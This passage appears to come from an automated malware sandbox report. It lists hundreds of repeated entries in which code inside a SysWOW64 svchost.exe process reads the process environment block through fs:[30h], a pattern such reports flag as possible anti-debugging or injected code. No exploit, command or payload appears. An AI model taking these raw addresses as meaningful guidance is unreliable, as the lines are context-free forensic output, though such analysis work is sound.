            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B701F8 mov eax, dword ptr fs:[00000030h] 2_2_00B701F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BBE1D0 mov eax, dword ptr fs:[00000030h] 2_2_00BBE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BBE1D0 mov eax, dword ptr fs:[00000030h] 2_2_00BBE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BBE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_00BBE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BBE1D0 mov eax, dword ptr fs:[00000030h] 2_2_00BBE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BBE1D0 mov eax, dword ptr fs:[00000030h] 2_2_00BBE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B70124 mov eax, dword ptr fs:[00000030h] 2_2_00B70124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C14164 mov eax, dword ptr fs:[00000030h] 2_2_00C14164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C14164 mov eax, dword ptr fs:[00000030h] 2_2_00C14164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEA118 mov ecx, dword ptr fs:[00000030h] 2_2_00BEA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEA118 mov eax, dword ptr fs:[00000030h] 2_2_00BEA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEA118 mov eax, dword ptr fs:[00000030h] 2_2_00BEA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEA118 mov eax, dword ptr fs:[00000030h] 2_2_00BEA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h] 2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE10E mov ecx, dword ptr fs:[00000030h] 2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h] 2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h] 2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE10E mov ecx, dword ptr fs:[00000030h] 2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h] 2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h] 2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE10E mov ecx, dword ptr fs:[00000030h] 2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE10E mov eax, dword ptr fs:[00000030h] 2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE10E mov ecx, dword ptr fs:[00000030h] 2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C00115 mov eax, dword ptr fs:[00000030h] 2_2_00C00115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B46154 mov eax, dword ptr fs:[00000030h] 2_2_00B46154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B46154 mov eax, dword ptr fs:[00000030h] 2_2_00B46154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3C156 mov eax, dword ptr fs:[00000030h] 2_2_00B3C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD8158 mov eax, dword ptr fs:[00000030h] 2_2_00BD8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD4144 mov eax, dword ptr fs:[00000030h] 2_2_00BD4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD4144 mov eax, dword ptr fs:[00000030h] 2_2_00BD4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD4144 mov ecx, dword ptr fs:[00000030h] 2_2_00BD4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD4144 mov eax, dword ptr fs:[00000030h] 2_2_00BD4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD4144 mov eax, dword ptr fs:[00000030h] 2_2_00BD4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B502A0 mov eax, dword ptr fs:[00000030h] 2_2_00B502A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B502A0 mov eax, dword ptr fs:[00000030h] 2_2_00B502A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C162D6 mov eax, dword ptr fs:[00000030h] 2_2_00C162D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD62A0 mov eax, dword ptr fs:[00000030h] 2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD62A0 mov ecx, dword ptr fs:[00000030h] 2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD62A0 mov eax, dword ptr fs:[00000030h] 2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD62A0 mov eax, dword ptr fs:[00000030h] 2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD62A0 mov eax, dword ptr fs:[00000030h] 2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD62A0 mov eax, dword ptr fs:[00000030h] 2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B7E284 mov eax, dword ptr fs:[00000030h] 2_2_00B7E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B7E284 mov eax, dword ptr fs:[00000030h] 2_2_00B7E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC0283 mov eax, dword ptr fs:[00000030h] 2_2_00BC0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC0283 mov eax, dword ptr fs:[00000030h] 2_2_00BC0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC0283 mov eax, dword ptr fs:[00000030h] 2_2_00BC0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B502E1 mov eax, dword ptr fs:[00000030h] 2_2_00B502E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B502E1 mov eax, dword ptr fs:[00000030h] 2_2_00B502E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B502E1 mov eax, dword ptr fs:[00000030h] 2_2_00B502E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A2C3 mov eax, dword ptr fs:[00000030h] 2_2_00B4A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A2C3 mov eax, dword ptr fs:[00000030h] 2_2_00B4A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A2C3 mov eax, dword ptr fs:[00000030h] 2_2_00B4A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A2C3 mov eax, dword ptr fs:[00000030h] 2_2_00B4A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A2C3 mov eax, dword ptr fs:[00000030h] 2_2_00B4A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3823B mov eax, dword ptr fs:[00000030h] 2_2_00B3823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C1625D mov eax, dword ptr fs:[00000030h] 2_2_00C1625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h] 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B44260 mov eax, dword ptr fs:[00000030h] 2_2_00B44260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B44260 mov eax, dword ptr fs:[00000030h] 2_2_00B44260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B44260 mov eax, dword ptr fs:[00000030h] 2_2_00B44260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3826B mov eax, dword ptr fs:[00000030h] 2_2_00B3826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3A250 mov eax, dword ptr fs:[00000030h] 2_2_00B3A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B46259 mov eax, dword ptr fs:[00000030h] 2_2_00B46259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BFA250 mov eax, dword ptr fs:[00000030h] 2_2_00BFA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BFA250 mov eax, dword ptr fs:[00000030h] 2_2_00BFA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC8243 mov eax, dword ptr fs:[00000030h] 2_2_00BC8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC8243 mov ecx, dword ptr fs:[00000030h] 2_2_00BC8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B38397 mov eax, dword ptr fs:[00000030h] 2_2_00B38397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B38397 mov eax, dword ptr fs:[00000030h] 2_2_00B38397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B38397 mov eax, dword ptr fs:[00000030h] 2_2_00B38397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B6438F mov eax, dword ptr fs:[00000030h] 2_2_00B6438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B6438F mov eax, dword ptr fs:[00000030h] 2_2_00B6438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3E388 mov eax, dword ptr fs:[00000030h] 2_2_00B3E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3E388 mov eax, dword ptr fs:[00000030h] 2_2_00B3E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3E388 mov eax, dword ptr fs:[00000030h] 2_2_00B3E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B5E3F0 mov eax, dword ptr fs:[00000030h] 2_2_00B5E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B5E3F0 mov eax, dword ptr fs:[00000030h] 2_2_00B5E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B5E3F0 mov eax, dword ptr fs:[00000030h] 2_2_00B5E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B763FF mov eax, dword ptr fs:[00000030h] 2_2_00B763FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h] 2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h] 2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h] 2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h] 2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h] 2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h] 2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h] 2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h] 2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE3DB mov eax, dword ptr fs:[00000030h] 2_2_00BEE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE3DB mov eax, dword ptr fs:[00000030h] 2_2_00BEE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE3DB mov ecx, dword ptr fs:[00000030h] 2_2_00BEE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BEE3DB mov eax, dword ptr fs:[00000030h] 2_2_00BEE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE43D4 mov eax, dword ptr fs:[00000030h] 2_2_00BE43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE43D4 mov eax, dword ptr fs:[00000030h] 2_2_00BE43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BFC3CD mov eax, dword ptr fs:[00000030h] 2_2_00BFC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h] 2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h] 2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h] 2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h] 2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h] 2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h] 2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B483C0 mov eax, dword ptr fs:[00000030h] 2_2_00B483C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B483C0 mov eax, dword ptr fs:[00000030h] 2_2_00B483C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B483C0 mov eax, dword ptr fs:[00000030h] 2_2_00B483C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B483C0 mov eax, dword ptr fs:[00000030h] 2_2_00B483C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC63C0 mov eax, dword ptr fs:[00000030h] 2_2_00BC63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C1634F mov eax, dword ptr fs:[00000030h] 2_2_00C1634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C0A352 mov eax, dword ptr fs:[00000030h] 2_2_00C0A352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3C310 mov ecx, dword ptr fs:[00000030h] 2_2_00B3C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B60310 mov ecx, dword ptr fs:[00000030h] 2_2_00B60310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B7A30B mov eax, dword ptr fs:[00000030h] 2_2_00B7A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B7A30B mov eax, dword ptr fs:[00000030h] 2_2_00B7A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B7A30B mov eax, dword ptr fs:[00000030h] 2_2_00B7A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE437C mov eax, dword ptr fs:[00000030h] 2_2_00BE437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC035C mov eax, dword ptr fs:[00000030h] 2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC035C mov eax, dword ptr fs:[00000030h] 2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC035C mov eax, dword ptr fs:[00000030h] 2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC035C mov ecx, dword ptr fs:[00000030h] 2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC035C mov eax, dword ptr fs:[00000030h] 2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC035C mov eax, dword ptr fs:[00000030h] 2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C18324 mov eax, dword ptr fs:[00000030h] 2_2_00C18324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C18324 mov ecx, dword ptr fs:[00000030h] 2_2_00C18324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C18324 mov eax, dword ptr fs:[00000030h] 2_2_00C18324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C18324 mov eax, dword ptr fs:[00000030h] 2_2_00C18324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE8350 mov ecx, dword ptr fs:[00000030h] 2_2_00BE8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h] 2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B744B0 mov ecx, dword ptr fs:[00000030h] 2_2_00B744B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BCA4B0 mov eax, dword ptr fs:[00000030h] 2_2_00BCA4B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B464AB mov eax, dword ptr fs:[00000030h] 2_2_00B464AB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BFA49A mov eax, dword ptr fs:[00000030h] 2_2_00BFA49A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B404E5 mov ecx, dword ptr fs:[00000030h] 2_2_00B404E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B7A430 mov eax, dword ptr fs:[00000030h] 2_2_00B7A430
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3E420 mov eax, dword ptr fs:[00000030h] 2_2_00B3E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3E420 mov eax, dword ptr fs:[00000030h] 2_2_00B3E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3E420 mov eax, dword ptr fs:[00000030h] 2_2_00B3E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3C427 mov eax, dword ptr fs:[00000030h] 2_2_00B3C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B78402 mov eax, dword ptr fs:[00000030h]2_2_00B78402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B78402 mov eax, dword ptr fs:[00000030h]2_2_00B78402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B78402 mov eax, dword ptr fs:[00000030h]2_2_00B78402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6A470 mov eax, dword ptr fs:[00000030h]2_2_00B6A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6A470 mov eax, dword ptr fs:[00000030h]2_2_00B6A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6A470 mov eax, dword ptr fs:[00000030h]2_2_00B6A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCC460 mov ecx, dword ptr fs:[00000030h]2_2_00BCC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFA456 mov eax, dword ptr fs:[00000030h]2_2_00BFA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6245A mov eax, dword ptr fs:[00000030h]2_2_00B6245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3645D mov eax, dword ptr fs:[00000030h]2_2_00B3645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B645B1 mov eax, dword ptr fs:[00000030h]2_2_00B645B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B645B1 mov eax, dword ptr fs:[00000030h]2_2_00B645B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC05A7 mov eax, dword ptr fs:[00000030h]2_2_00BC05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC05A7 mov eax, dword ptr fs:[00000030h]2_2_00BC05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC05A7 mov eax, dword ptr fs:[00000030h]2_2_00BC05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E59C mov eax, dword ptr fs:[00000030h]2_2_00B7E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B42582 mov eax, dword ptr fs:[00000030h]2_2_00B42582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B42582 mov ecx, dword ptr fs:[00000030h]2_2_00B42582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B74588 mov eax, dword ptr fs:[00000030h]2_2_00B74588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B425E0 mov eax, dword ptr fs:[00000030h]2_2_00B425E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C5ED mov eax, dword ptr fs:[00000030h]2_2_00B7C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C5ED mov eax, dword ptr fs:[00000030h]2_2_00B7C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B465D0 mov eax, dword ptr fs:[00000030h]2_2_00B465D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A5D0 mov eax, dword ptr fs:[00000030h]2_2_00B7A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A5D0 mov eax, dword ptr fs:[00000030h]2_2_00B7A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E5CF mov eax, dword ptr fs:[00000030h]2_2_00B7E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E5CF mov eax, dword ptr fs:[00000030h]2_2_00B7E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
